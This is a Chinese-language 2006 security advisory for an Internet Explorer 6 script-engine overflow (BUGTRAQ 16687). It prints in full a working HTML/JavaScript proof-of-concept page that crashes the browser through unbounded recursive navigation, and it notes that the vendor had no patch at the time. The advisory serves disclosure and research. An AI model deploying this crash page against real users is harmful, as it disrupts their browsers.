动网论坛,站长建站首选,国内使用量最多的论坛软件 动网论坛官方技术讨论区 站长工具 申请属于您自己的免费论坛
首页 | 新闻资讯 | 网站运营 | 网络编程 | 数据库 | 服务器 | 网页设计 | 图像媒体 | 网络应用 | 搜索优化 | 资源下载 | 动网主机 | DVBOX
    本站内  互联网 ASP论坛  ASP.Net论坛  PHP论坛
   安全 → 阅读文章

 Microsoft Internet Explorer脚本引擎溢出漏洞

作者:51CTO.COM 来源:51CTO.COM  
阅读 1480 人次 , 2006-3-18 17:40:00 



信息提供:

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

异常条件处理失败错误

攻击类型:

远程攻击

发布日期:

2006-02-16

更新日期:

2006-02-17

受影响系统:

Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0

安全系统:

漏洞报告人:

porkythepig (porkythepig@anspi.pl

漏洞描述:

BUGTRAQ  ID: 16687

Microsoft Internet Explorer是非常流行的WEB浏览器。

Internet Explorer VBScript和JScript引擎中存在远程溢出漏洞,可能导致浏览器失效。也可能导致代码执行,但未经证实。

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>

<head>

<title>IExploiter</title>

<script language="JavaScript">

var xcnt=0;

var va;

var xsiz=400;

var xoffs=10;

var yoffs=5;

function f14()

{

alert("asdasd");

}

function f50(command,args)

{



xw=(document.body.clientWidth-xsiz)/2;

va=window.open("","aa","height=50,width="+xsiz+",status=no,toolbar=no,menubar=no,top="+600+",left="+xw);

va.document.writeln("<body bgcolor=#0 text=#858585>");

va.document.writeln("<FORM NAME=\"myForm\" > </FORM>");

va.document.writeln("<FORM NAME=\"f117nighthawk\" > </FORM>");

var lnk11=va.document.all.item("myForm");

lnk11.style.position="absolute";

lnk11.style.left=10+xoffs;

lnk11.style.top=30+yoffs;

lnk11.style.color=0x858585;

lnk11.style.fontfamily="Arial";

lnk11.style.fontSize="10pt";

lnk11.innerText="Call stack recurrency nesting level: ";

var lnk11=va.document.all.item("f117nighthawk");

lnk11.style.position="absolute";

lnk11.style.left=220+xoffs;

lnk11.style.color=0x800000;

lnk11.style.fontfamily="Arial";

lnk11.style.fontSize="20pt";

lnk11.innerText="1";

lnk11.style.top=30-12+yoffs;

f2();

}

function f2()

{

if(!va.closed)

{

var lnk11=va.document.all.item("f117nighthawk");

xcnt=xcnt+1;

lnk11.innerText=xcnt;

eval("location='http://www.microsoft.com'");

}

else

{

eval("location='http://www.google.com'");

}

f2();

//    alert("asdasd");

}

function ld()

{

if(navigator.appName!="Microsoft Internet Explorer")

{

alert("Sorry Bro, only flammable stuff beyond this point,\nInternet Explorer needed to crash properly.");

}

else

{

var as1=document.all.item("g1");

as1.style.visibility="visible";

as1.style.position="absolute";

var lft1=(document.body.clientWidth-as1.width)/2;

var top1=(document.body.clientHeight-as1.height)/2;

var mainw=as1.width;

as1.style.left=lft1;

as1.style.top=top1;

as1.style.cursor="hand";

as1.style.backgroundImage="";

var as1=document.all.item("g2");

as1.style.visibility="visible";

as1.style.position="absolute";

as1.style.left=lft1-as1.width;

as1.style.top=top1+250;

var as1=document.all.item("g3");

as1.style.visibility="visible";

as1.style.position="absolute";

var lft=(document.body.clientWidth-as1.width)/2;

as1.style.left=lft1+mainw;

as1.style.top=top1+200;

}



}

</script>

</head>

<body bgcolor="#000010" onload="ld()" onresize="ld()" style="overflow:hidden">

<IMG NAME="g1" style="visibility:hidden" SRC="Mila6324exploited.jpg" onclick="f50()">

<IMG NAME="g2" style="visibility:hidden" SRC="Image2.gif">

<IMG NAME="g3" style="visibility:hidden" SRC="Image5.gif">

</body>

</html>

解决方法:

厂商补丁:

Microsoft

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

(  

 本文Tags病毒  
 收藏本文  打印本文  论坛讨论  关闭窗口
· 上一篇:Microsoft Windows畸形IGMPv3报文远程拒绝服务漏洞
· 下一篇:Cisco多个产品TACACS+访问认证绕过漏洞
· 电子认证服务管理法律制度简介
· 美“电脑风暴”演习结束 测试应对PC攻击能力
· 网络管理员的好帮手--Sniffer
· 魔与道的反复较量 反垃圾邮件技术点评
· 自动化部署安全更新--神奇的SUS服务


关于本站 | 联系我们 | 业务合作 | 客户案例 | 诚聘英才 | 广告合作 | 收藏本站
海口动网先锋网络科技有限公司版权所有
Copyright © 2000 - 2006 Cndw.Com
中华人民共和国电信与信息服务业务经营许可证编号 琼 ICP 020077